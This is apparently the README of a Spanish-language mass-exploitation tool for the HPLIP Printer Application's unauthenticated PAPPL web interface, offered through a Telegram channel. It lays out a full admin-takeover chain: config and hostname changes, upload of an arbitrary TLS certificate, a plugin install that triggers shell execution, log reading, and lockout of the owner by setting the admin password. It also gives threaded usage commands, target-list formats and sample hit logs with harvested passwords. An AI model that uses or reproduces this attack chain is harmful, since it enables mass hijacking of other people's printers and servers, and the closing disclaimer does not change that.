HPLIP < 3.26.6 — Toma de control total del administrador a través de la interfaz web de PAPPL (sin autenticación). Relacionado con CVE-2026-91097 hasta CVE-2026-91106 (CVSS 9.3)
🔬 Únete a Telegram para las últimas investigaciones de vulnerabilidades y lanzamientos de exploits
Herramienta de explotación masiva dirigida a la HPLIP Printer Application (interfaz web basada en PAPPL) en todas las versiones de HPLIP anteriores a 3.26.6. La herramienta explota el estado predeterminado sin autenticación de la interfaz web de PAPPL para realizar una cadena completa de toma de control administrativa: manipulación de la configuración, modificación del nombre de host, reemplazo del certificado TLS, instalación del plugin de HP (desencadena la ejecución mediante shell del archivo .run en el objetivo), exfiltración de registros del sistema y bloqueo de la contraseña de administrador.
La vulnerabilidad principal es el Acceso Administrativo Sin Autenticación de PAPPL — la HPLIP Printer Application se distribuye con ninguna contraseña configurada por defecto, lo que permite a cualquier atacante de red realizar todas las acciones administrativas sin autenticación a través de la interfaz web (normalmente el puerto 8000).
Además, la cadena de instalación de plugins aprovecha debilidades abordadas en:
| CVE | CWE | CVSS 4.0 | Relevancia |
|---|---|---|---|
| CVE-2026-91097 | CWE-94 / CWE-787 | 7.0 | Path Traversal en plugin.spec — la instalación del plugin desencadenada por esta herramienta pasa por el código vulnerable de pluginhandler.py |
| CVE-2026-91102 | CWE-78 / CWE-494 | 8.4 | Descarga sin verificación de integridad — el archivo .run del plugin se descarga por HTTP y se ejecuta con sh en el objetivo |
Boletín de seguridad de HP: HPSBPI04151
| Endpoint | Acción | Verificado |
|---|---|---|
/security | Establecer contraseña de administrador (toma de control de cuenta) | ✅ |
/config | Modificar nombre DNS-SD, ubicación, organización, contacto | ✅ |
/network | Cambiar el nombre de host del sistema | ✅ |
/tls-install-crt | Subir certificado TLS arbitrario + clave privada | ✅ |
/plugin | Desencadenar descarga del plugin de HP + aceptación de licencia + instalación (ejecuta .run con sh) | ✅ |
/logfile.txt | Leer el archivo de registro completo de la aplicación (divulgación de información) | ✅ |
Target Discovery
│
▼
Detect HPLIP Printer Application (Server header + version)
│
▼
Check Authentication Status (/security)
│
├── Password Set ──► Log as VULN (locked)
│
└── No Password (default) ──► Exploit Chain:
│
├── 1. Modify Configuration (/config)
│ dns_sd_name, location, organization, contact_name
│ Verified: marker reflected in response
│
├── 2. Change Hostname (/network)
│ Old hostname captured, new hostname set
│ Verified: new value reflected in response
│
├── 3. Upload TLS Certificate (/tls-install-crt)
│ Custom PEM certificate + private key
│ Multipart file upload
│
├── 4. Install HP Plugin (/plugin)
│ Step 1: POST action=install-plugin (downloads .run)
│ Step 2: POST action=license-accepted (executes with sh)
│ ⚠ CVE-2026-91097 + CVE-2026-91102
│
├── 5. Read Log File (/logfile.txt)
│ System paths, environment info, Snap paths
│
└── 6. Set Admin Password (/security)
Locks out further unauthenticated access
Completes full admin takeover
pip install requests
Se requiere Python 3.8+. Sin otras dependencias.
python T.py targets.txt 50
| Argumento | Descripción | Predeterminado |
|---|---|---|
targets.txt | Archivo que contiene la lista de objetivos (uno por línea) | Se solicita |
50 | Número de hilos concurrentes | 15 |
python T.py
La herramienta solicitará el archivo de lista de objetivos y el número de hilos.
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
8000 por defecto# se ignoran| Archivo | Contenido |
|---|---|
AdminS.txt | Toma de control administrativa — contraseña, versión del servidor, mapa completo de URL del panel |
Nx_modify.txt | Cambios verificados de configuración y nombre de host (valores antiguos → nuevos) |
Nx_upload.txt | Confirmaciones de subida de certificados TLS |
Nx_plugin.txt | Resultados de la instalación del plugin de HP con estado de ejecución mediante shell |
Nx_recon.txt | Divulgación de información — tamaño del archivo de registro, rutas de entorno, versión |
AdminS.txthttp://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...
Nx_modify.txthttp://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
██████ ██ ██ ██
██ ███ ██ ██ ██
██ ██████ ███
██ █████ ██ ██
██ ████ ██ ██
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HPLIP Printer Application │ Admin Takeover + Full Control
Affected < 3.26.6 │ PAPPL Unauthenticated Access
CVE-2026-91097 │ Plugin Path Traversal
CVE-2026-91102 │ Plugin Download Without Integrity + Shell Exec
Exploited via Web: /security /config /network /plugin /tls-install-crt /logs
By: Nxploited ( Khaled Alenazi ) │ Telegram: @Kxploit
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
targets=4 threads=4
00:11:34 [CUPS ] http://192.168.1.100:8000 Server: HPLIP_Printer_Application/3.22.10-13
00:11:34 [VER ] http://192.168.1.100:8000 v3.22.10 < 3.26.6 AFFECTED
00:11:35 [PROBE ] http://192.168.1.100:8000 v3.22.10 | NO AUTH | exploiting...
00:11:36 [CFG ] http://192.168.1.100:8000 CONFIG MODIFIED | marker=abc12345
00:11:37 [NET ] http://192.168.1.100:8000 HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
00:11:38 [CERT ] http://192.168.1.100:8000 TLS CERT UPLOADED | marker=abc12345
00:12:03 [PLG ] http://192.168.1.100:8000 PLUGIN | freshly_installed | shell_exec=True
00:12:05 [LOG ] http://192.168.1.100:8000 logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
00:12:05 [ADMIN ] http://192.168.1.100:8000 PASSWORD SET | pw=Nx-zD_buovl6wko0
00:12:05 [HIT ] http://192.168.1.100:8000 v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
DONE 4/4 █ HIT=4 █ VULN=0 █ SAFE=0 █ SKIP=0
▐ Admin Takeover: 4 └─ AdminS.txt
▐ Modifications : 8 └─ Nx_modify.txt
▐ Cert Uploads : 4 └─ Nx_upload.txt
▐ Plugin Exec : 1 └─ Nx_plugin.txt
▐ Recon / Info : 8 └─ Nx_recon.txt
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
| Etiqueta | Significado |
|---|---|
HIT | Explotado con éxito — toma de control administrativa lograda |
VULN | Vulnerable pero la contraseña ya está establecida (bloqueado) |
SAFE | Versión ≥ 3.26.6 (parcheada) |
SKIP | No es una HPLIP Printer Application o no es accesible |
/var/snap/hplip-printer-app/common/sh plugin.run --keep --nox11, que ejecuta el binario oficial del plugin de HP — el contenido se descarga desde los servidores de HP; el atacante no controla el contenido del plugin pero desencadena su ejecuciónBy: Nxploited
Esta herramienta se proporciona estrictamente para investigación de seguridad autorizada, pruebas de penetración y fines educativos únicamente. El uso de esta herramienta contra sistemas sin permiso escrito explícito del propietario del sistema es ilegal y poco ético. El autor no asume ninguna responsabilidad por cualquier uso indebido, daño o consecuencia legal derivada del uso de esta herramienta. Obtenga siempre la autorización adecuada antes de realizar cualquier evaluación de seguridad. Al utilizar esta herramienta, usted acepta que es el único responsable de sus acciones y del cumplimiento de todas las leyes y regulaciones aplicables.